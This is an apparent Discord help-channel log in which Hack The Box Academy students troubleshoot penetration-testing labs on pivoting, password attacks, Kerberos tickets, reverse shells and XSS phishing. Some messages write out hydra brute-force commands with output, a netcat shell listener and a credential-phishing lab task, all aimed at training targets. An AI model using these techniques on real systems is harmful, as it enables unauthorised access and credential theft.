#modules

ICMP Tunneling with SOCKS:
https://academy.hackthebox.com/module/158/section/1438

ubuntu@WEB01:~/ptunnel-ng/src$ sudo ./ptunnel-ng -r10.129.81.39 -R22
[sudo] password for ubuntu:
./ptunnel-ng: error while loading shared libraries: libcrypto.so.3: cannot open shared object file: No such file or directory

I followed all steps mentioned in module.
I also installed autoconf.
But Im facing issue.

Please help while building which command Should I use.
Or which version it will resolve the issue.

@fathom pendant please help

well bloodhound is just very noisy tbf

Oh yeah

whereas you can just load Find-InterestingAcls -ResolveGuids into a variable and use echo or something to query it

ok, the previous user logins worked - the instructions are just incorrect for this question:

#1234357888114364508 then

didnt know about that - cheers

also authenticate to can mean various things, such as using evil-winrm

if it's not specified assume some odd connection

no it was 100% a typo - that user doesnt even exist on that server, have raised in erratum

Don't see the error? Unless you mean the connection reset.

I used ligolo as well for this and it worked fine for me

Yes the connection reset.. When I nmap it doesn't work. Ping does work.

Also deleting your message bc it reveals some of the stuff of the module

Try a different vpn region? I had no issues on US 3

oh ok.. I took the latest agent&proxy from the releases..

Same

Also did you try adding -Pn to your nmap scan to be sure?

:)

I'll try, but I changed vpn many times so I don't know if thats the solution. Yes I added -Pn

us academy 3 worked for me ¯_(ツ)_/¯

I had 0 issues with nmap

Also this may sound dumb

But did you start the tunnel?

Yes of course:) Can I send you in private the code I used? Even though in the image - you see that it works

Well tbf your image only showed you connected to the session not that you started the tunnel

Sent you in private.. Thanks!

Didn't consent to dm

Idk what your issue could be and I can't be bothered to troubleshoot for you. You can try a different pivoting tool to see if it works better

Anyone please guide

Hi. I want to give a recommendation on using the Academy HTB website. It would be convenient if there was a "Add to my favorites modules" button in the open module, and not just in the section where all modules are listed.

Can I pleaseget some help with the whole billing/cubes model. I want to do the CREST CCT INF Preparation path which costs 11510 cubes. I understand the monthly billing thing where you get cubes every month or you can buy cubes outright. But how does the yearly subscriptions work? I don't understand the "all modules up to Tier 2/Tier 3" thing.

Every module will show which tier it is

The yearly subscription will allow you to unlock up to a certain tier, and if you complete the module, it is yours forever

Given there are 58 modules in the CREST CCT INF Preparation path, do I have to click into each one to find out what tier it is?

I'm just trying to figure out the most cost effective way of studying this

Yeah that would mean having to do some calculations 🙂

it also depends on how fast you go through the content

because with the monthly plans, you get a certain amount each billing cycle

that's the case of annual plans and the student subs

Do I need to go on a monthly or yearly plan or can I just outright buy the 11510 cubes?

11510 is too much cubes

if you can afford the golden plans , will be the fastest way

and from what I understand I also get cubes for finishing modules too?

yeah

no

Ok cool, I'm just going to start with the free one to see what the modules are like. How can I tell how many cubes I need to unlock a module?

unlocks for 500 and you get 100 after completing the module

For each module higher than Tier 0, you will be reimbursed 20% of the costs once you have completed the module in full.

https://academy.hackthebox.com/faq

I can't seem to see that. For example in this module https://academy.hackthebox.com/module/details/25 where am I supposed to look for how many I need

I get it now, but it's just really hard to calculate over 58 modules

that's tier 3 , you can use this as reference

ok got it now, thanks guys

if you check path , you will findout how many cubes to unlock the whole path

I think the best value for me is to just buy the cubes outright

in 5000 cube lots

Final question, once I complete a module it is mine forever right? I don't need to re-unlock it or anything

yeah

Hello guys! I’m finishing the “Linux fundamentals” module of “Information Security Foundations” path. There are a lot of informations to remember. What is you approch and method for study all content ? It is enough to do the exercises ?

hey guys, I'm currently studying the Shells and Payloads module the reverse shells section.

Whenever I try to perform a reverse shell using the command given in the reading I get this error. I tried it on my machine and got the same error.
I solved it on my machine buy putting the command inside a reverse.ps1 file, but it doesn't seem to be working on the pawnbox.

and this is the full command

Play with Linux as much as possible. Try out all kinds of things. The module will explain to you exactly how it works. Then apply it as much as possible in your daily use of Linux.

Thanks. 🙏

try to run it through command prompt

ur a lifesaver. Thanks

Anyone faced this error when running the CVE-2020-0668.exe exploit from windows priv esc, kernel section ?

Unhandled Exception: System.IO.FileNotFoundException: Could not load file or assembly 'NtApiDotNet, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null' or one of its dependencies. The system cannot find the file specified. at CVE_2020_0668.Program.Main(String[] args)

ah nvm, I fixed it you have to copy all the exploit files not just the exe

Got the next flag but somewehre along the way managed to skip this one any hints?

Pivoting, Tunneling, and Port Forwarding | Skill Assessment

What is refearred as workstation is the win 10 internal host ?

Lol found it

In the last machine there are 2 flags

Hey guys, I am new here and trying to start a career in cybersecurity. Can anyone provide me some guidance of where I should start from.

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Hah! I was so relieved when I found both flags within seconds. I was afraid I had another layer of pivoting to go. 😅
I just finished up last night myself.

Module - footprinting, Can someone please provide more context on what this means and what exactly we are trying to gather information about?

Try to find a working XSS payload for the Image URL form found at '/phishing' in the above server, and then use what you learned in this section to prepare a malicious URL that injects a malicious login form. Then visit '/phishing/send.php' to send the URL to the victim, and they will log into the malicious login form. If you did everything correctly, you should receive the victim's login credentials, which you can use to login to 'phishing/login.php' and obtain the flag.

need some help, when i run the command sudo php -S 0.0.0.0:80 i got the message error. failed to listen due to address being use? how to resolve?

Use a different port and adjust your URL accordingly @limber surge

It is because your port is already being used

Or kill the process that is using port 80.

or that

My take would be that this is asking you to think about why the computers or systems that you discover exist. Consider an example: A user enters their information into a payment portal (source) -- it's saved to a database (destination). You might not see the database yet, but you could assume that data is going somewhere and that's important to keep in mind.

indeed, and also about the nature of client<->server communication. your requests (any actions you perform or attempt to make) do not simply dissipate into the ether after a command/action is taken, another actual "computer" is receiving and processing it, and like mentioned already you are rarely "see" it.

@zenith canopy ^

Hello, I need some help to solve Linux stack-based buffer overflows skills assessment.
I've managed to change the execution flow of the program, and have a reverse shell as htb-student, not as root. Someone had the same problem in 2022, but unfortunately, he doesnt say much about it.

hello i am in module Web Attcks on Mass IDOR Enumeration section, i am spawning my target and am accessing it on the browser. For some reason when i am trying to access the Documents page i cant, also when i manually type the /documents.php i go to a page with no docuemnts to download

I found what you were talking about, now working on getting sqlmap to inject

Has anyone heard of VPN services like NordVPN causing false positives on portscans?

can you paste some screen shots of what the pages look like when you try to access them? maybe also do a curl on the ../documents.php page and share that output? is burp intercept turned on?

im not having that issue

Hey guys im stuck here someone can help? Its for tns footprinting

ohhh, thanksss

--break-system-packages on the pip3 install

"No module" generally means it's not installed not that it doesn't exist

Fighting with nibbler. Using msf to run the exploit nibbleblog_file_upload and all I get back it exploit completed, but no session created. This exploit may require manual cleanup of "image.php" on target. Any thoughts

Did you set the lhost properly?

I thought I did

set lhost tun0

Running now

so do i need to look in the file line 54 what the name is of the module?µ

No

Literally look at what I said prior to that

The python3.11 installs natively come with an EXTERNALLY-MANAGED file, that's what that info message means

And explains alternative ways to install

@fathom pendant - latest stable debian codename bookworm for info 🙂

can I DM for a nudge pls?

hi guys, i want to know are there any ctfs in htb that can be completed only with bug bounty hunter path knowledge?

Hey again, i created a virtual enviroment with python, is it recommanded to create those for every tool i will use ? like this

I just finished the hard footprinting lab, and I have a question. I had to use show solution once I gained the ssh foothold, and it said I needed to use mysql. How could I have enumerated the need to use SQL on my own?

idk

You can always look to see what services are running which were not visible from a port scan (e.g. they're firewalled off or only listening to 127.0.0.1). I feel like this is brought up more in future modules. I haven't reached the privesc module yet, but this should be a step you take in privilege escalation.

I usually use the following more or less

ss -lntp

I am also on that module, did your nmap results not show the running MSSQL service?

hi I am doing the Password mutations section of password attacks module. there's only one question. I generated a list of password mutations. I have hydra cracking for the intended user based on the mutated password list I generated. this is taking forever and I wanna make sure I'm doing the right thing:

┌─[us-academy-4]─[10.10.14.4]─[htb-ac-605555@htb-yxahj9jcvm]─[~/Desktop/Password-Attacks]
└──╼ [★]$ hydra -l "sam" -P mut_password.list ssh://10.129.194.249
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-09-11 12:54:21
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 94044 login tries (l:1/p:94044), ~5878 tries per task
[DATA] attacking ssh://10.129.194.249:22/


[STATUS] 111.00 tries/min, 111 tries in 00:01h, 93937 to do in 14:07h, 12 active

I think 14 hours is a long time

is there anything I can do to speed it up?

Are there any other services running; are any of those a little snappier?

ok thanks

Nope. Just imap, pop3, ssh, and snmp

Thank you> i'm gonna note this down for the future

hey, im new here and i was wondering if someone could teach me how to ethical hack

I would suggest you create a virtualenv anytime you've got to install requirements from pip. With python utilities requiring external requirements, you'd often do the following during setup to install dependencies:

$ pip install -r requirements.txt

The requirements file defines the libraries required and their versions. While you can install dependencies into the OS with pip you'll quickly find they're treading on each other and stuff gets broke quickly. The virtual environment isolates these installations, avoiding the problem.

Hello, I'm currently doing the Linux fundamentals module and I found something I dont quite understand...
If I run

$ cat << EOF > test.txt

I get the expected input from STDIN into the file.
However I played around a bit more and found this:

$ cat << EOF << EOF > test.txt

This requires me to use EOF twice before it actually quits and it sends everything I send (even after the first EOF) to the file...
I thought it would error out or something... or somehow try to create a second file given taht the signal is called "End of File"
I know this is not really "useful" but I just wanna understand whats going on.
Is the first EOF deleted as the second one comes around wrapped or somehow ?
Can someone explain to me whats happening here ? What am I missing ?

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

my nmap results showed ftp and I'm trying that but that's also taking forever

it also shows SMB but the target doesn't have SMBv1 open and I guess hydra uses SMBv1?

aaaanything else?

Ah. Yes.

┌─[us-academy-4]─[10.10.14.4]─[htb-ac-605555@htb-yxahj9jcvm]─[~/Desktop/Password-Attacks]
└──╼ [★]$ hydra -l sam -P mut_password.list 10.129.194.249 ftp
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-09-11 13:14:54
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 94044 login tries (l:1/p:94044), ~5878 tries per task
[DATA] attacking ftp://10.129.194.249:21/
[STATUS] 252.00 tries/min, 252 tries in 00:01h, 93792 to do in 06:13h, 16 active

6 hours and 13 minutes is a long time

Yea, hydra is a little behind on the times with SMB. Any other utilities to try?

ok hold on

ok now I'm using crackmapexec to dictionary attack it

we'll see where it goes

Let 'em all rip. It's like a race where you're always the winner... unless your not because it is a dictionary attack, after all.

j/k, 6 hours I'd terminate that sucker.

do you mean like this?

bcs sometimes i can install what i need but other times i receive this kind of error

Yes, I'd approach trying to resolve those dependencies by first creating a virtualenv. I don't recall jumping through a lot of hoops with odat in the footprinting module, but I also use kali and the VPN, so it might have already been installed for me.

I'm doing crackmapexec it appears to be going much quicker than hydra. we'll see if it gets through entire list in a few more minutes

LLMNR/NBT-NS Poisoning - from Linux.
Is the rockyou.txt supposed to be the correct wordlist to use?

okej so what you saying is like installing the moduls like ussual (apt install ....) but if it don't work bcs they are externally managed then its better to create a virtual env?

I think that here is some sage advice on the the installation of that utility from someone more familiar than me. #modules message

but, yes, in my experience when I have to install some dependencies via pip I create a virtualenv.

how long should I give crackmapexec to crack it?

The module should have pretty clear directions for installing anything.

I was going to wait another 3 minutes and then ask for a screen shot, but we can do it now.

Can you share a capture of the output you're getting from CME?

okej thank, yeah he talked about break-system-packages but it would be better to know why some packages can and other can't be installed ^^ i will make more researches thank you 🙂

that screenshot is from a minute ago

bruteforcing smb

Ok, can we DM?

sure

Command Injection
Advanced Command Obfuscation
I dont know how to escape '-n 1' part of the challenge without throwing base64 at all of this

LLMNR/NBT-NS Poisoning - from Linux.
Is the rockyou.txt supposed to be the correct wordlist to use? i've tried the rockyou.txt file download from git, the rockyou.txt that i had to gunzip on the pwnbox, the password.list from previous modules, and the mut_password.list. None successful.

nvm, got it to work

You can but it's literally not required

The info message displayed literally tells you what you can do to circumvent

Okej like i see you look to have more experience then me what should you recommand? Just install it the way they tell you like pip3 or pipx or to do it with a --break-system-packages?

Do it with --break-system-packages

Or if you can, pipx doesn't check that file

I just did the section I will paste the script I used to setup odat:

wget https://download.oracle.com/otn_software/linux/instantclient/214000/instantclient-basic-linux.x64-21.4.0.0.0dbru.zip && wget https://download.oracle.com/otn_software/linux/instantclient/214000/instantclient-sqlplus-linux.x64-21.4.0.0.0dbru.zip && sudo mkdir -p /opt/oracle && sudo unzip -d /opt/oracle instantclient-basic-linux.x64-21.4.0.0.0dbru.zip && sudo unzip -d /opt/oracle instantclient-sqlplus-linux.x64-21.4.0.0.0dbru.zip && cd /opt/oracle/instantclient_21_4 && find . -type f | sort && export LD_LIBRARY_PATH=/opt/oracle/instantclient_21_4:$LD_LIBRARY_PATH && export PATH=$LD_LIBRARY_PATH:$PATH && source ~/.bashrc && sqlplus -V

it set it up in like 2 seconds

The problem is in recent python installs, there's a file added in that breaks the script

its ok i also finsihed it i just want more info bcs i know that breaking the system packages is not really recommended and i dont want to do things that i dont understand that why i ask a lot of questions ^^

It doesn't matter at the end of the day

oh wait I installed it on the pwnbox, im guessing its happening in VMs?

The info message happens on pwnbox too

tools that u use do you unsinstall them after using them or do you keep them?

I keep them

I guess I was lucky to not run into that many problems

Why would I uninstall a tool I might use in the future

Depends when you did it

just did it

like 5 mins ago

¯_(ツ)_/¯

Either way

I always recommend going through the script line by line

idk haha the thing that make me scared is this thing of is the problems it can make at my OS by using the breaking....

Bc sometimes it breaks partway through

It won't generally cause problems my guy

How can I share a computer science meme

so we develop an understanding of how the script works? 🤔

okej i trust you then and if it ever happen just install it ?

No bc sometimes it just flat out breaks and some lines don't get run

oohhh alright

I generally just use --break-system-packages (or go in and delete the EXTERNALLY-MANAGED file)

@fathom pendant when do u sleep bro

Yes

okej thanks you help is really precious you help a lot of people here thanks for that

Another option is doing sudo apt install python3-packagename which is stated in the externally managed message

yeah but i think i also received a warning message or something

If apt doesn't have the package then you have to install with pip/pipx

Hello,
I'll repost the question from earlier to get some more eyes on it, just wanna avoid spamming...
I'm currently doing the Linux fundamentals module and I found something I dont quite understand...
If I run

$ cat << EOF > test.txt

I get the expected input from STDIN into the file.
However I played around a bit more and found this:

$ cat << EOF << EOF > test.txt

This requires me to use EOF twice before it actually quits and it sends everything I send (even after the first EOF) to the file...
I thought it would error out or something... or somehow try to create a second file given taht the signal is called "End of File"
I know this is not really "useful" but I just wanna understand whats going on.
Is the first EOF deleted as the second one comes around wrapped or somehow ?

In addition I also found this:

$ cat << EOF << SIGKILL << EOF > test1.txt
heredoc> test 1
heredoc> EOF
heredoc> SIGKILL
heredoc> test2
heredoc> EOF

In my head the SIGKILL should kill the cat process before it can receive the final input right ?
Can someone explain to me whats happening here ? What am I missing ?

It's because of "heredoc" stuff

https://linuxize.com/post/bash-heredoc/

You're basically giving it a closing key with each subsequent <<

interesting... is this an extension to bash somehow or built-in ?

Finally got my shell on nibbler but when I get to unzip personal.zip I get unknown: command. Thoughts

It's a built in

Unzip should be on the system if not gunzip may work. I don't recall having issues

awesome!
now that I know what to look for, I'll look into it more!
thank you very much for the answer!

Unzip didn't work either. It says suddenly is an unknown command as well

Gunzip *

Weird

Both should be on the system

Sudo* fat fingers today

Well your user has limited sudo perms anyway

I've switched servers and targets as well

The SMTP section of the footprinting course really need an update, specially with the questions

Why

? The only rough bit was the tns section. Everything else holds up fairly well

Tbh the explanation wasnt that great in that section like often I wouldnt understand what they tryna convey. Maybe it's on me but I use gpt to help me understand it longer and easier way

Eh oracle tns is just another type of database

Yea also other parts of the module I was getting confused but that's because it was fresh info to me

You're more likely to see mysql externally and mssql internally

I liked the labs

hello guys

Hello 🙂

Any recommendation from these "take-notes" tools to work through CPTS learning path?

I like Notepad++ but not sure if it is macOS compatible

I use Notion

Notion too

Notion is web based, nothing gets installed locally, does it?

Recently obsidian but notion Do the trick

yes its cloud based. If you want to keep things local then you can use obsidian

I kinda prefer it all local to keep it secret lol

Available on macOS and Windows but in the case of Linux you can use it on the web

if its just course notes then it don't really matter. I don't use it for sensitive stuff

I will try Obsidian for the time being

thank you guys

I use obsidian

It's because you have powerview imported

Don't we have to import powerview before using it?

Nope

All the commands in that are in native Active-Directory

but even though I imported why is it throwing errors?

Oki Gotcha

Because something in powerview is conflicting with activedirectory

Got it Thanks it worked

The module is above t0 btw so please don't share screenshots of the module content

Oh Sorry I will not from future

.

I have heard obsidian is good but u cant have it access on the web iirc

I mean you can if you're clever enough

But also

I have been using regular md files and pushing on github

There's a git extension for obsidian btw

Wait what lol

Yeah lol

💀

Breh

You can sync to a private repo

Is that not what u meant?💀

No lol

I just use regular md files on my github for each section

Guys I have a problem with pentester path, password attacks, password mutations. I modified the password and tried using crackmapexec, I was told by other people here that the command is correct and I was even told what letter the password starts with, I deleted all passwords that didn't start with the letter b in password.list file and then i used hashcat to mutate the passwords with custom.rule. then I use crackmapexec and even if the target doesnt respawn and doesnt do anything weird, and i get "connection error: the NetBIOS connection with the remote host has timed out"
This has been going on for like 2 days where I kept leaving crackmapexec do its own thing and it didn't get solved. I even deleted my Kali image and installed a new one and the problem is the same. Ofc I changed vpns and spawned many different targets

There's the official obsidian sync that's like $5 a month or something

Cause sometimes I study at work and I open in browser everything

I wouldn't modify the passwords file tbh

And your error is a connection error

So I just edit files on github directly with edit option

Also make sure the repo is private

So use password.list instead of mut_password.list?

I meant the mutated list

Don't make any modifications, as that list is reused a lot

Oh even if it's like my own explanations?

Yes

In one week I'll need to delete my Kali image again so it doesn't really matter

How do I solve this thing

Because I can't even finish the list

Well the connection error sounds like you're not connected to the vpn

Or your connection isn't stable

Also use netexec instead

Ok lemme try

Yeah but idk if it’s avaible on the web, obsidian Helps me make cleaner notes and notion helps me follow my action plan

Same error

@fathom pendant do I have to contact technical support for this? Because it seems like its not working on many vm's I create

Yeah probably best to do that

Hey guys i dont really understand the error? i tried different hashes with different delimiters but still the same error?

Did you copy the admin: part?

yeah i treid that to

Also you can make it so it outputs in a hashcat friendly manner

also with :salt at the end

There's no :salt to tack on

with the admin: part i receive a token length exception

Hi is there a way to take previous terminal command output and move it to a file besides ctrl shift c?

I looked it up and didn’t get relevant results

Because the results are only for current command

guys i need a help i am for Windows Privilege Escalation Skills Assessment - Part I, but i am having problem to generate the target, it is generated but it does not ping, when i run nmap it does not throw me data or anything, has anyone else had this happen and do you know how to fix it? i have already changed vpn 3 times, and nothing happens

try -Pn

previous? do you mean like !100 > file.txt ?

you can also use !! > file.txt for previous

idk tho

I looked through whole thing and someone said I had right terminal input and told me what letter the password starts with and I looked and can't find it

re run the cmd and use the redirect > operator, or pipe to tee echo "hello world" | tee -a out.txt | xargs ...

just did it

Can someone help with LPE - Shared Object Hijacking ? cp /lib/x86_64-linux-gnu/libc.so.6 /development/libshared.so
cp: cannot create regular file '/development/libshared.so': Permission denied

ipmi.txt isn't being considered as a path because it doesnt exist where hashcat can see it/is looking for it

and the literal "ipmi.txt" obviously isn't a hash format with a proper separator and thus triggers a parser error for lacking the separators

Re-read the question on what it is asking you to do.

someone tried to help me with the password mutations section in the password attacks module. I believe I have the right command and for some reason its not giving it to me. The output in the attached file is part of the output but I think its not the full output. The member I worked with confirmed the answer was under the Bs not As. The problem is the pwnbox always runs out of time no matter how long I give it before the command closes. I'm thinking maybe I need to do it from a VM? I came a little closer with ag's help but I am getting no where.

[edit: I'm not allowed to post the actual output on the server]

The password won't show up even with that output and I think the command is right or else the output wouldn't look like that.

Should I install Parrot on my own device in VM and crack locally? What would you recommend I do?

Can you remove that file please.

ok

Firstly massive output lol, secondly Tier 1 module, but you can ask for advice regarding why your approach to this step is not working, but without posting specifics like that

Could be a simple matter of wrong wordlist

or username

I know I generated right wordlist and the guy I got help from agreed

I know its the right username because they give you the username

and it says in the module how to generate the right wordlist

and I checked that I did it correctly and then verified with someone else from this server

I mean I'd say it's gotta be network issues then, but you were getting auth denied responses there

ok

but then I was attacking the target

when attacking on pwnbox

so isn't evasion advanced?

I'm clearly doing something wrong here

like when it comes to this challenge like I don't get it

The king has spoken

can someone tell me what my issue is? do I need to let it go on longer?

like I feel like the issue might be that pwnbox can only be expanded for so long

I know I have the right wordlist because I generate the wordlist with a command done to a file that is given in the resources.

so unless the resources changes the file I don't see how it can be possible for me to have wrong list

🤷‍♂️

because I was trying diffferent protocols

I have to be overthinking this

Them sharing solutions, shouldn't really do that but there we go

Check out what else is available to you 🙂

ok

is anything else going to solve the section?

I mean for this section?

I can't really say much else, past go through the module again, pay close attention and don't go off the word of others for a solution if you can avoid it

on the official parrot website i dont see htb edition

the password module can be pretty misleading, it harps really hard on finding the password policy to shape your attack, it mentions specific password lengths, and then completely ignores those things in the skill assessment

It's under the "Live" download options @empty trout

yeah found

thanks

Is the manual SQL injection that is covered in CPTS enough to then go on and complete OSCP or is there other additional modules you should cover?

no, completing the SQL fundamentals module is not enough to pass OSCP. there's a lot more to it than SQL injection.

ok so this means 47 hours?

[STATUS] 33.00 tries/min, 33 tries in 00:01h, 94011 to do in 47:29h, 4 active

that's part of the output I get I don't want to post more output as to not spoil it.

which means it will take forever

should I try a different tool if this is the case?

no one can really answer you based on that info. different protocols have different thresholds for concurrent connections and it looks like you're using really low threads.

ok

probably best to just use the tool showcased

Lol sorry I meant the entire CPTS and all of the modules including the SQL injections modules within it

i can't comment myself since i haven't done oscp but from what i read pretty much everyone says if you struggle with oscp and their content to take the cpts course becuase it preps you way better than the actual oscp course itself

as to the course contents, it's not even close CPTS blows OSCP out of the water

Thanks I have heard the same. I'm in the middle of doing the sqlmap module and found out in OSCP it all has to be done manually. I just thought what was covered might be slightly light in the sql injection fundementals module for the OSCP but was unsure.

lmfao one of the last sections of AEN (closing up)

Hacked around 250 Targets
400+ module sections completed
500+ challenge questions solved
Over 750,000 words read

over 750,000 words read, you don't say

there's a basic sqli module

which really just goes over the barebones basics of what you'd need to know

SSH to the target, create a bind shell, then use netcat to connect to the target using the bind shell you set up. When you have completed the exercise, submit the contents of the flag.txt file located at /customscripts. -- Im stuck on create a bind shell. it just gets stuck on "Listening on 0.0.0.0" any advice?

you're missing a lot of info in your question, like module/section, what you're doing to try and get the shell, etc.

it could literally be anything based off what you said

https://academy.hackthebox.com/achievement/badge/ec79fd2b-70ae-11ef-864f-bea50ffe6cb4

GG

Nice one 🙂

when you taking the test marcielee?

after going through and reading the module after doing it blind; i'm glad to see what i wrote off as "not notable" was validated

and i had grabbed the relevant flags or had the relevant stuff saved in notes to crack a password or two

that wasn't part of the main path

10000% worth doing AEN blind as a test of your methodology; no reading questions or anything

I'm having trouble in the skill assessment of the "Using Web Proxies " module can someone help me?

yes many here can help

did you try using a web proxy

I was trying to send a screenshot but it wasnt letting me. Im doing the Shells & Payloads > Bind Shells Questions. I went through all of the steps on the page where it says "Binding a bash shell to the tcp session". Trying to get the "flag.txt" file located at "/customscripts"

hey @ocean night can I get a message pinned about how to effectively asking questions (Ik i have the ability to pin things due to discord permission shenanigans, but i'd like the ok to do so)

then you haven't done it correctly

the general steps are:
decode until you can't decode anymore N steps
grab that hash, and use that as the prefix for your attack
use just the wordlist stated in the question
re-encode the payload in the reverse order you decoded it in

note you'll need to select the whole cookie in your to do this with

too many spoilers brother

@pure apex please refrain from posting spoilers of high-level modules :)

it was yeeted before you replied

i am 2fast2nolife

it's literally written in the question

lol no that command with the hash is definitely not included in the question

even if it's written in the question, it's a module above t0

okay I'm sorry then I didn't know

Opps... where should I ask then?

believe it or not, straight to jail

this is the right place to ask for module help

😢

but don't post content directly related to the module/lab

if you really feel the need to; redact as much as possible while it still being understandable to those that have done it

i think you got your wires crossed?

his deleted comment showed the hash and the full command he used to ptt

im trying to instal sqlplus on my VM for the sql footprinting course and i am having a wonderful time trying can anybody help me ? disclaimer: Im using a macbook pro m3 arm64 architecture. (yes i know i picked one of the most difficult pcs to use lol) @fathom pendant

or a mod deleted it or whatever

wrong person

it was PK that had the hash command

not KM

ahh lol

KM is working on the web proxies module

what's up with these two letter names

When asking for advice, please include the module and section. Include a description of what you have tried, and where you are struggling. If the module you are working on is above Tier 0, then do not post specifics, rather keep your query generic, and somebody may reach out to you.

where he as to re-encode the decoded hash with extra characters tacked on

lol I was looking back at my messages looking for a command

ye

hi @fathom pendant can I DM you?

about?

kinda miffed that my notes on Injection Attacks skills assessment are pretty much non-existent

Alright, let me rephrase. In the Golden Ticket section of the Kerberos attack module, I created a ticket and used the method taught in the module with PowerView to generate the SID, along with the NTLM provided in the exercise. However, I can't seem to move laterally to dc01. I'm not sure why

oh it's extra? I was replacing the last letter

yes

i believe the hint or something explicitly calls it out for being one character too short

thank you I think that was my mistake

yes but I misunderstood the instructions

just printed one of the sections my eyes are tired now

printed?

bro who uses printers anymore

just a genral question if we do a nmap on a target in htb we have to put it in our etc host right?

company has so use

lol

no... nmap doesn't really have much to do with the hosts file.. unless you're trying to scan a hostname

im doing the Skills assessment on INfo gathering and do have a hostname i should nmap

info gathering you don't need to scan with nmap afaik

you'll need to use the other techniques presented in the module

like go buster?

the hostname is for you to dig into as a web interface

i believe it's also a public_ip:port no?

hi I have a question involving content that is blocked on the server potentially because it could be a spoiler. anyone I can DM?

I would be really grateful

its regarding the password mutations section of the password attacks module

Certainly including too much detail there queuemark

See the recently pinned comment

I don't see it

don't see why there'd be anything blocked on a server?

Click Pinned Messages

ok

unless you're saying the download isn't going through?

i genuinely don't recall any sort of blocking in place aside from ports shutting down from hammering too hard

It's due to a match on content in the post as a block for another reason.

ah

misunderstood

words are hard

i only see the section name and module

So I initialized the database for metasploit its still saying no active db when I run the exploit.

that's nothing to really do with anything

why is it not letting me run the exploit?

i don't recall using metasploit to crack the password

i'm sure you could

but i used hydra

and focused on one of the other ports not mentioned by the question

hydra isn't working in my case neither is crackmapexec

that's odd

both hydra and crackmapexec are simply going too slow

its too long of a time. I'm thinking maybe I should install parrot OS in a VM and see if that does it

Gave all the advice you need in our chat TBH

i mean

but someone else maybe can put it in different words

you can use moar threads with hydra

the maximum stable threads i've found is 48

my pattern is I try stuff and don't get it one day and sometimes I need to sleep on it

so I'm just gonna do that and try again tomorrow

because maybe I just need a break

¯_(ツ)_/¯

doesn’t seem to be working

let's not put him down for it

likely just a slight change in thinking is in order

I think I got up earlier than usual today I'll try again tomorrow. I was working on it.

it shouldn't take more than like 30 minutes at most

it's all about having the patience to wait for it to do its job

ok you know what I will try the 48 threads thing

see if it does it. I will just go back and do something else for 30 minutes

since I don't want to just give up on this

I sometimes overthink simple things like this

so we'll see I'll hopefully get it by the end of the night

something generally helpful for hydra syntax:
hydra -(l | L) user[.list] -(p | P) password[.list] [protocol]://(ip | hostname) -t <threads>

I already did that and set it to 48 threads

also don't conflate actual time with the reported expected time

the expected time is just if it has to go to the last entry in the list

I think I've found the issue, and I would like to ask for some guidance from my seniors. When creating a Golden Ticket, the SID should theoretically come from the domain SID. However, in a well-known training material, they use Mimikatz to extract the SID from a non-DC workstation and use it to create the ticket. Their method actually works, which caused some confusion when I was trying different approaches in HTB's advanced modules. Could you provide me with some guidance? Thank you all

a SID is just a unique identifier given to computers, users, and certain objects.

im doing info gathering final one

and my whois is not working '

this is not working

htb isn't a real tld, so the whois command doesn't know how to proceed

but i put it in my host files

that just allows you to resolve the host

and it says to use who is

ok but the whois server you're querying doesn't know what the .htb tld is because it's not real

Only for the first question about .com

As inlanefreight.com is a real website

whois can only query registered domains

im struggling to get this one

Yeah

whois won't get the system architecture or anything

You'll need to dig a bit to figure it out

Also did you try just looking at response headers?

As stated by the question it's not looking for a version

Just the framework

Do y'all ever get the issue of the VPN going stale and having to be restarted? It's usually not a huge deal but some of the sqlmap commands take a metric ton of time where they eventually fail, so I was wondering if anybody had a fix for it.

English please

Not sure how your English is but #rules see 5

Personally no. Try changing your connection from udp to tcp

Well thank you very much

I'll give that a go

I will try to increase my programming experience with you, but in the English language

I expect that you should add the Arabic language

The server has no plans to stop being English only as a majority of staff and mods speak English

Is there any hope that you will add a special section for Arabs in the future?

is it possible that the questions in module 18 section 80 got placed in the wrong section? they seem to be practice exercises for another topic than the one taught in that module

No

🌹Thanks

What module is that?

I will try to speak through the translator

In future use the module and section name not their numbers

18

Getting Started --> Knowledge Check
https://academy.hackthebox.com/module/77/section/859

My reverse shell isn't connecting. I used the same php as in the previous box (nibbles) with minor adjustments to suit this new box, but when i go to gettingstarted and the ip address as urls, neither one creates the reverse shell in my terminal, where nc -lvnp 4444 is waiting. What would you suggest looking into or trying?

linux fundementals - filter contents

Since you're writing it into an existing php block you don't need to prefix it with <?php

You also need to visit that specific page to trigger it

wdym by visit that specific page

dont i just have to go to the gettingstarted / ip addr page?

No

You have to go to the page hosting the php file

I removed the php prefix/suffix, still no

ohhhh

I went to that, it just states the text that I put in as a php file

Then you goofed it

That's fun

Php statements need to end in a ;

it has one

All of those commands were already discussed in a prior section, you need to string the prior learning with this. See the system information section.

But try wrapping it back in the pre/suffix

i tried that, it made the text go away but still no reverse shell

Oh

Dude

Your ip is wrong

AGAIN

Your ip goes in the nc part

I need hint on last question of
Password Attacks - Pass the Ticket (PtT) from Linux -
Question:- Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_).

I already have the ticket of LINUX01$, i can access the flag under \DC01\linux01.
I have the output but it doesn't work.

I think there's a nonprintable character at the start

It's why it specifies what it starts with

ok

How to get the file which is nonprintable? 😦

You can't

Just copy the text starting at that

AYY IT WORKED! That was the problem, I wasn't using my IP; also, I needed the php pre/suffixes

Don't copy that extra character before Us1nG_

it starts with "s"

Nope

It's telling you what phrase to start your copy from

ok

